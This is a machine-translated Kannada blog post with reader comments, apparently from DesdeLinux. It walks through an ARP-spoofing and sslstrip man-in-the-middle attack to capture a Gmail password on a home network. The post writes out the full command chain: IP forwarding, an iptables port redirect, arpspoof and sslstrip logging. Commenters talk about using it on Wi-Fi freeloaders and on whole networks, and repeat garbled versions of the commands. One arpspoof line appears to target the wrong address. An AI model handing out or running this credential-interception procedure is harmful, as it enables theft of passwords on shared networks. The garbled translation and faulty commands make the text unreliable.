ಹಲೋ ಬ್ಲಾಗಿಗರು.
ನಮ್ಮಲ್ಲಿ ಅನೇಕರು ಇಷ್ಟಪಡುವವರ ಸುರಕ್ಷತೆಯಿಲ್ಲದೆ ಯಾವುದೇ ನೆಟ್ವರ್ಕ್ನಲ್ಲಿ ಸಂಪರ್ಕ ಸಾಧಿಸುವುದು ಎಷ್ಟು ಅಪಾಯಕಾರಿ ಎಂಬುದರ ಒಂದು ಸಣ್ಣ ಮಾದರಿಯನ್ನು ಇಂದು ನಾನು ಹೊಂದಿದ್ದೇನೆ.
ಇಂದು, ನಾನು Gmail ಪಾಸ್ವರ್ಡ್ ಪಡೆಯಲು Sslstrip ನೊಂದಿಗೆ ArpSpoofing ಅನ್ನು ಬಳಸಲಿದ್ದೇನೆ. ಪರಿಸರವನ್ನು ಹೆಚ್ಚು ನಿಯಂತ್ರಿಸಲು, ನಾನು "ಎಂಬ ಖಾತೆಯನ್ನು ರಚಿಸಿದ್ದೇನೆtestarp@gmail.com".
ಮತ್ತು ನಾನು ಮುನ್ನುಡಿಗಳನ್ನು ಹೆಚ್ಚು ಇಷ್ಟಪಡದ ಕಾರಣ, ನಾವು ವ್ಯವಹಾರಕ್ಕೆ ಇಳಿಯೋಣ.
ಪರಿಸರ
ಈ ಪರೀಕ್ಷೆಗೆ ನಮ್ಮಲ್ಲಿರುವುದು ಈ ಕೆಳಗಿನಂತಿವೆ:
1. ದಾಳಿಕೋರ: ಇದು ನನ್ನ ಡೆಸ್ಕ್ಟಾಪ್ ಅಥವಾ ಡೆಸ್ಕ್ಟಾಪ್ ಕಂಪ್ಯೂಟರ್ ಆಗಿದ್ದು ಅದು ಡೆಬಿಯನ್ ವೀಜಿಯನ್ನು ಹೊಂದಿದೆ. ರೆಪೊಸಿಟರಿಗಳಿಂದ ನೀವು ಸ್ಥಾಪಿಸಬಹುದು sslstrip y dsniff ಹೊಂದಲು ಆರ್ಪ್ಸ್ಪೂಫಿಂಗ್
2. ಬಲಿಪಶು: ಬಲಿಪಶು ಆಂಡ್ರಾಯ್ಡ್ ಟ್ಯಾಬ್ಲೆಟ್ ಆಗಿದ್ದು ಅದು ಬ್ರೌಸರ್ ಮೂಲಕ ತನ್ನ ಮೇಲ್ ಅನ್ನು ಮಾತ್ರ ನೋಡಲು ಬಯಸುತ್ತದೆ.
3. ಮಧ್ಯಮ: ಮಧ್ಯ ನನ್ನದು ಸಿಸ್ಕೋ ಡಿಪಿಸಿ 2425 ರೂಟರ್
ವಿಳಾಸಗಳು.
ಆಕ್ರಮಣಕಾರರ ವಿಳಾಸ: 172.26.0.2
ರೂಟರ್ ವಿಳಾಸ: 172.26.0.1
ಸಂತ್ರಸ್ತೆಯ ವಿಳಾಸ: 172.26.0.8
ಅಟ್ಯಾಕ್:
ಈ ದಾಳಿಗೆ ನಾವು ಮಾಡುವ ಮೊದಲ ಕೆಲಸವೆಂದರೆ ಫಾರ್ವರ್ಡ್ ಅನ್ನು ಸಕ್ರಿಯಗೊಳಿಸುವುದರಿಂದ ನಮ್ಮ ಕಂಪ್ಯೂಟರ್ ಮಾಹಿತಿಯನ್ನು ಗಮನಿಸದೆ ಬಲಿಪಶುಕ್ಕೆ ರವಾನಿಸಬಹುದು. (ಇಲ್ಲದಿದ್ದರೆ ಅದು ಸೇವೆಗಳ ದಾಳಿಯ ನಿರಾಕರಣೆಯಾಗಿದೆ)
ಅದಕ್ಕಾಗಿ ನಾವು ಬಳಸುತ್ತೇವೆ:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
ಈಗ ನಾವು ಬಾಲ -f ಮಾಡಿದರೆ desdelinux ನಾವು ಮಾಹಿತಿಯನ್ನು ನೇರವಾಗಿ ಮತ್ತು ನೇರವಾಗಿ ನೋಡುತ್ತೇವೆ
ಹಾಗಾದರೆ ನಮಗೆ ಬೇಕಾದುದನ್ನು ನಾವು ಹೇಗೆ ಪಡೆಯುತ್ತೇವೆ?
ಮೊದಲು ನಮ್ಮ ಮೇಲ್ ಅನ್ನು ಟ್ಯಾಬ್ಲೆಟ್ನಲ್ಲಿ ನಮೂದಿಸೋಣ. ಲಾಗ್ ಇನ್ ಮಾಡುವಾಗ, ನಮ್ಮ ಕನ್ಸೋಲ್ನಲ್ಲಿ ಸಾವಿರಾರು ಮತ್ತು ಸಾವಿರಾರು ವಿಷಯಗಳು ಗೋಚರಿಸುವುದನ್ನು ನಾವು ನೋಡುತ್ತೇವೆ.
ಈಗ ಅದು ಮುಗಿದ ನಂತರ ನಮ್ಮ ಫೈಲ್ ಅನ್ನು ತೆರೆಯೋಣ "desdelinux” ನ್ಯಾನೊ ಜೊತೆ
nano desdelinux
ನಿಯಂತ್ರಣ + W ನೊಂದಿಗೆ ನಾವು ಸುರಕ್ಷಿತ ಪೋಸ್ಟ್ ಎಂದು ಕರೆಯುತ್ತೇವೆ.
ಮತ್ತು ನಾವು ಈ ರೀತಿಯದನ್ನು ನೋಡುತ್ತೇವೆ.
ನೋಡಲಾಗದ ಆ ದೊಡ್ಡ ಸಾಲಿನಲ್ಲಿ ಬಲಿಪಶುವಿನ ಇಮೇಲ್ ಮತ್ತು ಪಾಸ್ವರ್ಡ್ ಕೂಡ ಇದೆ.
ಆದ್ದರಿಂದ ನಾವು ಅಂತಿಮವಾಗಿ ಸುರಂಗದ ಕೊನೆಯಲ್ಲಿ ಬೆಳಕನ್ನು ನೋಡುವ ತನಕ ಬಲಕ್ಕೆ ಓಡುತ್ತೇವೆ.
ಈ ದಾಳಿಯಿಂದ ನಾವು ನಮ್ಮನ್ನು ಹೇಗೆ ರಕ್ಷಿಸಿಕೊಳ್ಳಬಹುದು ಎಂಬುದನ್ನು ಇನ್ನೊಂದು ಸಂದರ್ಭದಲ್ಲಿ ನೋಡುತ್ತೇವೆ.
ಸಂಬಂಧಿಸಿದಂತೆ
ಪೋಸ್ಟ್ ಪ್ರಕಟವಾದಾಗ, ಆಜ್ಞೆಗಳು ಸರಿಯಾಗಿಲ್ಲ ಎಂದು ಹೇಳಲು ನಾನು ಈ ಅವಕಾಶವನ್ನು ತೆಗೆದುಕೊಳ್ಳುತ್ತೇನೆ.
ಕೊನೆಯಲ್ಲಿರುವ iptables ಆಜ್ಞೆಯು 8080 ಅನ್ನು ಮತ್ತೊಂದು ಸಾಲಿನಲ್ಲಿ ಕಾಣೆಯಾಗಿದೆ. ತದನಂತರ ಆರ್ಪ್ಸ್ಪೂಫ್ ಆಜ್ಞೆಗಳು ಎಲ್ಲಾ ಒಂದೇ ಸಾಲಿನಲ್ಲಿವೆ. ಪ್ರತಿಯೊಂದು ಆಜ್ಞೆಯು ವಿಭಿನ್ನ ಸಾಲಿನಲ್ಲಿರುತ್ತದೆ.
ಆಶಾದಾಯಕವಾಗಿ ಸಂಪಾದಕ ಅದನ್ನು ನೋಡುತ್ತಾನೆ ಮತ್ತು ಅದನ್ನು ಸರಿಪಡಿಸಬಹುದು.
ಗ್ರೀಟಿಂಗ್ಸ್.
ನೀವು ಪ್ರಸ್ತಾಪಿಸಿದ ತಿದ್ದುಪಡಿಗಳನ್ನು ನಾನು ಮಾಡಿದ್ದೇನೆ, ಅದು ಸರಿಯೇ?
ನೀವು ಆದ್ಯತೆಯ ನಮೂದಿನಲ್ಲಿ ಕೋಡ್ ಸೇರಿಸಲು ಹೋದರೆ, HTML ವೀಕ್ಷಣೆಯನ್ನು ಬಳಸಿ, ಮತ್ತು ಲೇಖನವು ಬಾಕಿ ಇರುವಂತೆ ಕಳುಹಿಸುವ ಮೊದಲು ಅದು ಸರಿಯಾಗಿದೆಯೇ ಎಂದು ಪರಿಶೀಲಿಸಿ. ಧನ್ಯವಾದಗಳು.
ನಮ್ಮಲ್ಲಿ ಜ್ಞಾನವಿಲ್ಲದವರು ಅಷ್ಟು ದುರ್ಬಲರಾಗಿದ್ದಾರೆ ಎಂದು ತಿಳಿದುಕೊಳ್ಳುವುದು ತಣ್ಣಗಾಗಿದೆ. ನಾನು ಸ್ವಲ್ಪ ವಿಷಯವನ್ನು ಅರ್ಥಮಾಡಿಕೊಂಡಾಗಲೂ ಸಹ ಉತ್ತಮ ಮಾಹಿತಿ ಪ್ರಾಮುಖ್ಯತೆಯನ್ನು ನಾನು ಅರಿತುಕೊಳ್ಳುತ್ತೇನೆ. ಧನ್ಯವಾದಗಳು!
ಸಂಬಂಧಿಸಿದಂತೆ
ಆದರೆ ಆಕ್ರಮಣಕಾರ ಮತ್ತು ಬಲಿಪಶು ಒಂದೇ ನೆಟ್ವರ್ಕ್ನಲ್ಲಿದ್ದರೆ ಮಾತ್ರ ಅದು ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತದೆ. ಯಾವುದೇ ಸಂದರ್ಭದಲ್ಲಿ, (ಅದೇ ನೆಟ್ವರ್ಕ್ನಲ್ಲಿರುವುದರಿಂದ) ನೀವು ಎಚ್ಟಿಟಿಪಿಎಸ್ ಬಳಸಿ ಸಂಪರ್ಕಿಸಿದರೆ ಅದು ಸಂಭವಿಸುವುದಿಲ್ಲ ಏಕೆಂದರೆ ನಿಮ್ಮ ಯಂತ್ರವನ್ನು ಬಿಡುವ ಮೊದಲು ಡೇಟಾವನ್ನು ಎನ್ಕ್ರಿಪ್ಟ್ ಮಾಡಲಾಗುತ್ತದೆ. ನೀವು ಎಚ್ಟಿಟಿಪಿ ಮೂಲಕ ಸಂಪರ್ಕಿಸಿದರೆ (ಎಸ್ ಇಲ್ಲದೆ) ನೆಟ್ವರ್ಕ್ ಕೇಬಲ್ ಅನ್ನು ನೋಡುವುದರಿಂದಲೂ ನೀವು ಕೀಲಿಗಳನ್ನು ನೋಡುತ್ತೀರಿ ಎಂದು ನಾನು ಭಾವಿಸುತ್ತೇನೆ.
ಇದು ಸತ್ಯವಲ್ಲ. ನಾನು ಜಿಮೇಲ್ ಪಾಸ್ವರ್ಡ್ ಅನ್ನು ಹ್ಯಾಕ್ ಮಾಡುತ್ತಿದ್ದೇನೆ ಮತ್ತು ಜಿಮೇಲ್ https ಅನ್ನು ಬಳಸುವುದನ್ನು ನೀವು ಗಮನಿಸಿದರೆ. ಆದ್ದರಿಂದ? ವಿಷಯವೆಂದರೆ https ಸುರಕ್ಷಿತವಾಗಿದ್ದರೂ, ಅದು http ಅನ್ನು ಅವಲಂಬಿಸಿರುತ್ತದೆ. ಆದ್ದರಿಂದ ಅದು ಅಷ್ಟು ಸುರಕ್ಷಿತವಲ್ಲ.
H https ಬಗ್ಗೆ ಹೆಚ್ಚು ತಪ್ಪೊಪ್ಪಿಕೊಳ್ಳಬೇಡಿ ಎಸ್ ಸೂಪರ್ಮ್ಯಾನ್ಗೆ ಅಲ್ಲ ಅದು "ಸುರಕ್ಷಿತ" ಗಾಗಿರುತ್ತದೆ
ಇದು https ನೊಂದಿಗೆ ಅಥವಾ ಇಲ್ಲದೆ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತದೆ, ನಾನು ಅದನ್ನು ಹೆಚ್ಚು ವಿಶೇಷವಾದ ಲಿನಕ್ಸ್ ಡಿಸ್ಟ್ರೊದೊಂದಿಗೆ ಪ್ರಯತ್ನಿಸಿದೆ ಮತ್ತು ಇದು ಸಮಸ್ಯೆಗಳಿಲ್ಲದೆ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತದೆ
ನಿಮ್ಮ ವೈ-ಫೈ ಕದಿಯುವವರಿಗೆ ಪಾಠ ಕಲಿಸಲು ನೀವು ಇದನ್ನು ನಿಖರವಾಗಿ ಬಳಸಬಹುದು. 😀
ಚೆಮಾ ಅಲೋನ್ಸೊ ಅವರ ಬ್ಲಾಗ್ನಲ್ಲಿ ಅವರು ಬಹಳ ಹಿಂದೆಯೇ ಹೇಳಿದಂತೆ ಇದು ಹೆಚ್ಚು ಕಡಿಮೆ:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
ಓಸ್ಟಿಯಾ, ಅದು ಏನು ಮಾಡುತ್ತದೆ! / ತದನಂತರ ಅವರು ಬ್ಯಾಂಕ್ ಖಾತೆಯನ್ನು ಪರೀಕ್ಷಿಸಲು ಹೋದಾಗ ನಾನು ವಿಪಿಎನ್ ಬಳಸುವಾಗಲೆಲ್ಲಾ ಅವರು ನನ್ನ ವ್ಯಾಮೋಹವನ್ನು ಹೇಳುತ್ತಾರೆ…). ಅಂದಹಾಗೆ, ಕಾಮೆಂಟ್ಗಳಲ್ಲಿ ಜನರು ಎಷ್ಟು ಸಿನಿಕರಾಗಿದ್ದಾರೆ ಎಂಬುದನ್ನು ನೀವು ನೋಡಬೇಕು ... ಕೊನೆಯಲ್ಲಿ ಅದು ಕದಿಯುತ್ತಿದ್ದರೆ ...
ನಿಮ್ಮ ಸ್ವಂತ ವಿಪಿಎನ್ ಸೇವೆಯನ್ನು ಹೇಗೆ ರಚಿಸುವುದು ಮತ್ತು ನೀಡುವುದು ಎಂಬುದರ ಕುರಿತು ಈಗ ನಾವು ಟ್ಯುಟೋರಿಯಲ್ ತೆಗೆದುಕೊಳ್ಳಬೇಕಾಗಿದೆ.
ನೀವು ಲಿಂಕ್ ಮಾಡುವ ಕಥೆ ತುಂಬಾ ಆಸಕ್ತಿದಾಯಕವಾಗಿದೆ, ಇದು ಒಂದು ಕಾದಂಬರಿ ಪುಸ್ತಕಕ್ಕೂ ಯೋಗ್ಯವಾಗಿದೆ ಎಂದು ತೋರುತ್ತದೆ, ಮತ್ತು ನನ್ನ ನೆರೆಹೊರೆಯವರ ಅಂತರ್ಜಾಲವನ್ನು ನಾನು ಬಳಸಿದಾಗ ಇದು ನನಗೆ ನೆನಪಾಗುತ್ತದೆ ಮತ್ತು ನಾನು ಈ ವಿಷಯವನ್ನು ತಿಳಿದಿದ್ದೇನೆ ಎಂದು ಹೇಳುತ್ತಿದ್ದರೂ, ನಾನು ಎಂದಿಗೂ ನಿಜವಾದ ಆಯಾಮಗಳನ್ನು ನೋಡಲಾರೆ ಎಂದು ನಾನು ಭಾವಿಸುತ್ತೇನೆ ನಾನು ಕೊನೆಯದಾಗಿ ಹೊಂದಬಹುದಾದ ಅಪಾಯ, ಅದೃಷ್ಟವಶಾತ್ ನನಗೆ, ಅವರು ಪಾಸ್ವರ್ಡ್ ಅನ್ನು WPA2 ಗೆ ಮಾತ್ರ ಬದಲಾಯಿಸಿದ್ದಾರೆ ಮತ್ತು ಅಲ್ಲಿಯೇ ISP ಯೊಂದಿಗಿನ ನನ್ನ ಕಥೆ ಪ್ರಾರಂಭವಾಯಿತು
ಅದಕ್ಕಾಗಿಯೇ ಶೀರ್ಷಿಕೆ Sslstrip ಕ್ರಿಯೆಯಲ್ಲಿ ಹೇಳುತ್ತದೆ.
ಆಕ್ರಮಣಕಾರನು ಮಧ್ಯದಲ್ಲಿ ಇರುವವರೆಗೆ ಇದು ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತದೆ
ಪ್ರಿಸ್ಮ್ನಲ್ಲಿ ನೀವು ಯಾವ ತರಂಗದಲ್ಲಿ ಕೆಲಸ ಮಾಡುತ್ತೀರಿ? -.-
ಯಾವುದೇ.
ನಿಮ್ಮ ವಿನಂತಿಯನ್ನು ಎಕ್ಸ್ಡಿ ಕಳುಹಿಸಲು ನೀವು ಏನು ಕಾಯುತ್ತಿದ್ದೀರಿ
ಸಂಬಂಧಿಸಿದಂತೆ
ಒಳ್ಳೆಯ ಪೋಸ್ಟ್
ಕುತೂಹಲಕಾರಿ, ನಾನು ನಂತರ ಶೈಕ್ಷಣಿಕ ಪರೀಕ್ಷೆಯನ್ನು ಮಾಡುತ್ತೇನೆ ... ಬಹುಶಃ ನಾನು ವೈಫೈಗೆ ಪಾಸ್ವರ್ಡ್ ಅನ್ನು ತೆಗೆದುಹಾಕಬಹುದು ಮತ್ತು ಸ್ವಲ್ಪ ಮೋಜು ಮಾಡಬಹುದು
ಯಾವುದೇ ಆಕಸ್ಮಿಕವಾಗಿ, ಗುರಿ ಕೇಳಿದ ಪುಟಗಳಿಗೆ ವಿಭಿನ್ನ ಪುಟಗಳನ್ನು ಕಳುಹಿಸಲು ನೀವು ಏನಾದರೂ ಮಾಡಬಹುದೇ? ಉದಾಹರಣೆಗೆ, ಅವರು ಫೇಸ್ಬುಕ್ ತೆರೆಯಲು ಬಯಸುತ್ತಾರೆ ಮತ್ತು ನಾನು ಅವರನ್ನು Google ಗೆ ಮರುನಿರ್ದೇಶಿಸುತ್ತೇನೆ? 😛
ಹೌದು. ಆದರೆ ಇದು ತುಂಬಾ ವಿಭಿನ್ನವಾದ ರೋಲ್ ಆಗಿದೆ.
ಬಹುಶಃ ನಾನು ಅದನ್ನು ನಂತರ ಪೋಸ್ಟ್ ಮಾಡುತ್ತೇನೆ.
ಬಹಳ ಒಳ್ಳೆಯ ಪೋಸ್ಟ್, ಈ ವಿಷಯಗಳು ಬಹಳ ಶೈಕ್ಷಣಿಕವಾಗಿವೆ, ಈಗ ನಾವು ಈ ದಾಳಿಯನ್ನು ಎದುರಿಸಲು ಸಮರ್ಥರಾಗಿರಬೇಕು, ಏಕೆಂದರೆ ಕೆಲವರು (ನನ್ನಂತೆ) ಸಾರ್ವಜನಿಕ ನೆಟ್ವರ್ಕ್ಗಳಿಗೆ ಸಂಪರ್ಕ ಹೊಂದಿದ್ದಾರೆ (ಉದಾಹರಣೆಗೆ ವಿಶ್ವವಿದ್ಯಾಲಯ) ಅದನ್ನು ತಪ್ಪಿಸಲು ಇದು ಸಹಾಯಕವಾಗಿರುತ್ತದೆ.
ಧನ್ಯವಾದಗಳು!
ಇದು ನನಗೆ ಕೆಲಸ ಮಾಡಲಿಲ್ಲ
Https ಸಂಪರ್ಕಗಳನ್ನು ಸರ್ವರ್ ಪ್ರಮಾಣಪತ್ರದ ಮೂಲಕ ಎನ್ಕ್ರಿಪ್ಟ್ ಮಾಡಲಾಗಿದೆ (ನಿಮ್ಮ ಯಂತ್ರದಲ್ಲಿ ಒಮ್ಮೆ ನೀವು ಪ್ರಮಾಣಪತ್ರವನ್ನು ಹೊಂದಿದ್ದರೆ, ನಿಮ್ಮ ಬ್ರೌಸರ್ ಎನ್ಕ್ರಿಪ್ಶನ್ನ ಉಸ್ತುವಾರಿ ವಹಿಸುತ್ತದೆ) ಐಪಟೇಬಲ್ಗಳೊಂದಿಗೆ ನೀವು ಪೋರ್ಟ್ 80 (http) ಅನ್ನು ಮರುನಿರ್ದೇಶಿಸುತ್ತದೆ, 443 ಅಲ್ಲ , ಇದು https
ಅದನ್ನೂ ಯೋಚಿಸಿದೆ. ವಿಷಯವೆಂದರೆ https "ಸುರಕ್ಷಿತ" ಆಗಿದ್ದರೂ ಅದು ದುರದೃಷ್ಟವಶಾತ್ http ಅನ್ನು ಅವಲಂಬಿಸಿರುತ್ತದೆ. ಆದ್ದರಿಂದ sslstrip ಅದರ ಲಾಭವನ್ನು ಪಡೆದುಕೊಳ್ಳುತ್ತದೆ, ಅದು https ರುಜುವಾತುಗಳನ್ನು ಬಳಸುತ್ತಿದೆ ಎಂದು ಬ್ರೌಸರ್ ನಂಬುವಂತೆ ಮಾಡುತ್ತದೆ ಆದರೆ ಅದು ಅಲ್ಲ.
ಪವಿತ್ರ ಶಿಟ್! ಆದರೆ ಬ್ರೌಸರ್ "ಈ ಪ್ರಮಾಣಪತ್ರವು ಅನುಮಾನಾಸ್ಪದ ಸೈಟ್ನಿಂದ ಬಂದಿದೆ ಅಥವಾ ಅಂತಹದ್ದೇನಾದರೂ ಬರುತ್ತದೆ" ಎಂಬಂತಹ ಎಚ್ಚರಿಕೆಯನ್ನು ನೋಡಬೇಕು ... ನಾನು ಖಂಡಿತವಾಗಿಯೂ ಎಕ್ಸ್ಡಿ ಪರೀಕ್ಷೆಗಳನ್ನು ಮಾಡಬೇಕಾಗುತ್ತದೆ
ಇಲ್ಲ, ಸಂಪೂರ್ಣವಾಗಿ ಏನೂ ಹೊರಬರುವುದಿಲ್ಲ.
ಇದು ಅಂತಿಮವಾಗಿ ನನಗೆ ಕೆಲಸ ಮಾಡಿದೆ
ನಾನು ಪಾಸ್ವರ್ಡ್ನೊಂದಿಗೆ WEP ನೆಟ್ವರ್ಕ್ನಲ್ಲಿ ಸಂಪರ್ಕ ಹೊಂದಿದ್ದೇನೆ ಮತ್ತು ಅದು ಹೇಗಾದರೂ ಪಾಸ್ವರ್ಡ್ ಅನ್ನು ನೇರವಾಗಿ ನನಗೆ ತೋರಿಸಿದೆ.
ಒಂದು ಪ್ರಶ್ನೆ. ಒಂದೇ ಬಲಿಪಶುವನ್ನು ಹೊಂದುವ ಬದಲು ನೀವು ಇದೇ ವಿಧಾನವನ್ನು ಮಾಡಬಹುದು ಆದರೆ ನೆಟ್ವರ್ಕ್ನಲ್ಲಿ ಸಂಪರ್ಕಗೊಂಡಿರುವ ಎಲ್ಲಾ ಕಂಪ್ಯೂಟರ್ಗಳಿಗೆ?
ಹೌದು, ನೀನು ಮಾಡಬಹುದು. ಆದರೆ ನಾನು ಪ್ರಯೋಗಗಳನ್ನು ಮಾಡಿಲ್ಲ. ನೀವೇ ಪ್ರಯತ್ನಿಸಿ ಮತ್ತು ಅದು ಹೇಗೆ ನಡೆಯುತ್ತದೆ ಎಂದು ನಮಗೆ ತಿಳಿಸಿ.
ಇದರೊಂದಿಗೆ ನಾನು ಪಡೆಯುವ ಏಕೈಕ ವಿಷಯವೆಂದರೆ ಬಲಿಪಶುವಿನ ಯಂತ್ರವು ಆಫ್ಲೈನ್ನಲ್ಲಿ ಹೋಗುತ್ತದೆ, ಆದರೆ ಎಸ್ಎಸ್ಎಲ್ಸ್ಟ್ರಿಪ್ ನನಗೆ ಏನನ್ನೂ ತೋರಿಸುವುದಿಲ್ಲ: /
ನೀವು ಒಂದು ಕ್ಷಣ ಫೈರ್ವಾಲ್ ಅನ್ನು ನಿಷ್ಕ್ರಿಯಗೊಳಿಸಬೇಕು. ಅಥವಾ ಕನಿಷ್ಠ ಒಳಬರುವ ಸಂಪರ್ಕಗಳನ್ನು ಸಕ್ರಿಯಗೊಳಿಸಿ.
ತನಿಖೆ ಮತ್ತು ನಾನು ಫೇಸ್ಬುಕ್ ಪುಟದ ಬಳಕೆದಾರಹೆಸರು ಮತ್ತು ಪಾಸ್ವರ್ಡ್ ಅನ್ನು ಮಾತ್ರ ನೋಡಬಲ್ಲೆ, ಜಿಮೇಲ್ನಲ್ಲಿ ನಾನು ಲಾಗ್ನಲ್ಲಿ ಯಾವುದೇ ಫಲಿತಾಂಶಗಳನ್ನು ಕಂಡುಹಿಡಿಯಲಿಲ್ಲ, ನನಗೆ ಆರ್ಪ್ಸ್ಪೂಫ್ «ಆರ್ಪ್ಸ್ಪೂಫ್ -ಐ -ಟಿ of ನ ಒಂದು ಸಾಲು ಮಾತ್ರ ಬೇಕಾಗಿತ್ತು. ಮತ್ತೊಂದೆಡೆ, ಬಲಿಪಶು ಯಂತ್ರವು ಕೆಲವು ಪುಟಗಳನ್ನು ತೆರೆಯಲು ಸಾಧ್ಯವಾಗಲಿಲ್ಲ. ನಾನು ತನಿಖೆ ಮುಂದುವರಿಸುತ್ತೇನೆ, ಇದು ತುಂಬಾ ಆಸಕ್ತಿದಾಯಕವಾಗಿದೆ. ಮಂಜಾರೊವನ್ನು ಬಳಸುವವರಿಗೆ ಸಹಾಯ, ಸ್ಥಾಪಿಸಲು ಪ್ಯಾಕೇಜುಗಳು: ಡಿಎಸ್ನಿಫ್ (ಇಲ್ಲಿ ಆರ್ಪ್ಸ್ಪಾಫ್ ಆಗಿದೆ), ತಿರುಚಿದ ಮತ್ತು ಪೈಥಾನ್ 2-ಪಯೋಪೆನ್ಸ್ಲ್. Sslstrip ಅನ್ನು ಇಲ್ಲಿಂದ ಡೌನ್ಲೋಡ್ ಮಾಡಬಹುದು: http://www.thoughtcrime.org/software/sslstrip/
ಇದನ್ನು ಚಲಾಯಿಸಲು $ python2 sslstrip.py
ಗ್ರೀಟಿಂಗ್ಸ್.
ಅದು ಹೊರಬರಲಿಲ್ಲ ಆದರೆ ಆರ್ಪ್ಸ್ಪೂಫ್ ಲೈನ್: #arpspoof -i int -t ip-victim ip-router
ನೋಡಿ ನೀವು ಹೇಳಿದ್ದನ್ನು ನಾನು ಮಾಡುತ್ತೇನೆ:
ಪ್ರತಿಧ್ವನಿ "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –Destination-port 80 -j REDIRECT –to ports 8080
ಆರ್ಪ್ಸ್ಪೂಫ್ -i eth0 -t 172.26.0.8 172.26.0.1
ಆರ್ಪ್ಸ್ಪೂಫ್ -i eth0 -t 172.26.0.1 172.26.0.2
ಸಮಸ್ಯೆಯೆಂದರೆ, ನನ್ನ ಕೋಣೆಯಲ್ಲಿ ನಾನು ಹೊಂದಿರುವ ಮತ್ತೊಂದು ಪಿಸಿಯಾಗಿರುವ ಬಲಿಪಶು, ನಾನು ರೂಟರ್ ಅನ್ನು ಮರುಪ್ರಾರಂಭಿಸಬೇಕಾದ ಹಂತಕ್ಕೆ ನನಗೆ ಯಾವುದೇ ಸಂಪರ್ಕವಿಲ್ಲ, ನಾನು ಏನು ಸಹಾಯ ಮಾಡಬಹುದು.
ನಾನು ವರ್ಚುವಲ್ ಯಂತ್ರದೊಂದಿಗೆ ಕೆಲಸ ಮಾಡುತ್ತಿರುವ ಇನ್ನೊಂದು ವಿಷಯ, ಮತ್ತು ನಾನು ಐವ್ಕಾನ್ಫಿಗ್ ಆಜ್ಞೆಯನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸುವಾಗ, wlan0 ಕಾಣಿಸುವುದಿಲ್ಲ, ಅಥವಾ ನಾನು ifconfig ಅನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಿದಾಗ, ನನ್ನ ವರ್ಚುವಲ್ ಗಣಕದಲ್ಲಿ ಇಂಟರ್ನೆಟ್ ಇದ್ದರೆ, ಎಥ್ 0 ಇಂಟರ್ಫೇಸ್ನೊಂದಿಗೆ ಏನು.